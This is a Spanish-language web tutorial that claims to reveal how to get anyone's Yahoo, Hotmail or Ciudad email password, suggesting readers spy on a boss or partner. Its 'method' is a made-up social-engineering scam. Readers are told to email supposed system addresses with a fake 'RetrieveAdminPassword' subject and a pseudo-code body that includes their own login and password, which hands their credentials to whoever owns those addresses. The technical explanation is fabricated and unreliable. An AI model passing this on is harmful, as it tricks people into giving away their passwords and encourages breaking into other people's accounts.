Conocer como estos trabajan, administran las CUENTAS y los PASSWORD´S es algo realmente complejo y se requiere elevados conocimientos, muchísima paciencia y sobre todo cientos de noches en vela intentando descifrar el complejo y laberíntico universo de cada servidor de correo.

Hasta ahora solo he podido hackear unas pocas decenas de servidores de los cientos de miles k existen en el cyberespacio (k no es poco) y hoy quiero enseñarles como conseguir los password´s de algunas cuentas para k puedan divertirse y fanfarronear con sus amigos o leerle el correo a su jefe, novias/os etc., etc... ;)

recuerda k lo k voy a enseñarte es solo para divertirte y aprender un poco sobre el tema y no para hacer maldades ni cosas ilegales o k puedan perjudicar a terceros.

Si no estas de acuerdo con lo dicho anteriormente sal de esta Web ahora.

Me imaginaba k eras una buena y sigues en esta Web para formarte, aprender y divertirte sanamente ;)

Pero bueno.... basta de formalidades y vayamos al grano.

Los servidores de Yahoo y Hotmail basan su funcionamiento en una misma técnica k excede el alcance de este artículo. Lo k a nosotros nos interesa es saber es k por razones Obvias sería imposible administrar las cuentas de correo de millones de usuarios manualmente, por eso es k Yahoo, HotMail, Ciudad y en general todos los sistemas de correo utilizan sistemas automáticos de administración y control de acceso de sus usuarios.

De la misma manera, cuando un usuario ingresa a su cuenta, estos sistemas automáticos realizan la verificación del "username" y el "password" del usuario a través de una validación con el banco de datos.

Para hackear el password de un usuario sólo debemos acceder a este banco de datos valiéndonos precisamente de su sistema automático de verificación de passwords.

*El sistema nos dará el password porque accederemos como administradores del Servidor.

¿Qué necesitamos para empezar a divertirnos?

Una cuenta en Yahoo Mail (por ej: usuario@yahoo.com) , Yahoo Argentina (por ej: usuario@yahoo.com.ar ) k haya sido dada de alta antes del 31 de Marzo de 2007.

Es importantísimo k las cuentas cumplan con este requisito porque Las cuentas dadas de alta posteriormente, tienen un control de identificación del usuario diferente, lo cual ya no nos permite hacernos pasar por administradores del sistema.

*Si vas a hackear una cuenta de otro sistema, como Hotmail, necesitas una cuenta de ese sistema,
es necesario k haya sido dada de alta antes del 28 de Noviembre de 2006.

Cuál es el procedimiento?

El primer paso es muy simple, sólo debes entrar a tu propia cuenta de Yahoo.

*Si vas a hackear un password de otro sistema k no sea Yahoo, debes entrar a tu cuenta
en ese sistema.

Si no tenes una cuenta k cumpla las condiciones lo mas probable es k no funcione, solo en un 35%.

Una vez k ya haz entrado a tu cuenta, debes componer un mensaje con las siguientes
características:

En el campo "To:" debes escribir la dirección del sistema k contiene la base de datos
sobre la cual se realiza la verificación de passwords, en el caso de Yahoo
esta cuenta es: pass_sys_log@yahoo.com.ar

*Para Hotmail, la cuenta es : passw_ret_list@hotmail.com

*Para Ciudad, la cuenta es : passw_sys_log@ciudad.com.ar

una vez echo esto en el campo "Subjet:" debes escribir lo siguiente: RetrieveAdminPassword . (es importante k escribas el subjet tal y como está conservando las mayúsculas y minúsculas, si no lo haces bien el sistema no lo entenderá y fallaras )

En el cuerpo del mensaje debes escribir exactamente el siguiente código:

:form_pwd; login=%%ESCRIBE AQUI EL LOGIN DE TU VICTIMA%%
form.login.focus(); form.passwd.gets=''; form_pwd; value="yes";
sendto=#$ ESCRIBE AQUI TU LOGIN $#; form.passwd=@@ ESCRIBE TU PASSWORD @@
form_pwd; value="admin";

NOTA IMPORTANTE:
NO escribas la dirección completa de tu victima, solo el login (lo k va antes de la @).

Por ejemplo: Si la cuenta de la k quieres el password es "juan@yahoo.com", y
suponiendo k tu cuenta es "gustavo@yahoo.com" y tu password es "sepultura",
el código k pondrías se vería así:

:form_pwd; login=%%juan%%
form.login.focus(); form.passwd.gets=''; form_pwd; value="yes";
sendto=#$gustavo$#; form.passwd=@@sepultura@@
form_pwd; value="admin";

Ahora solo debes enviar el e-mail.

Cómo funciona este método?

Lo k hace este método es k cuando el sistema recibe el e-mail valida tu propia
cuenta como si se tratara de la cuenta del administrador,
y por lo tanto te da acceso al banco de datos k contiene los passwords de los usuarios,
después busca en este banco de datos el login k se solicitó (el de tu víctima),
cuando encuentra el login se remite al password, el cual es enviado de regreso a tu cuenta.
El tiempo de respuesta varía en función de los procesos del sistema.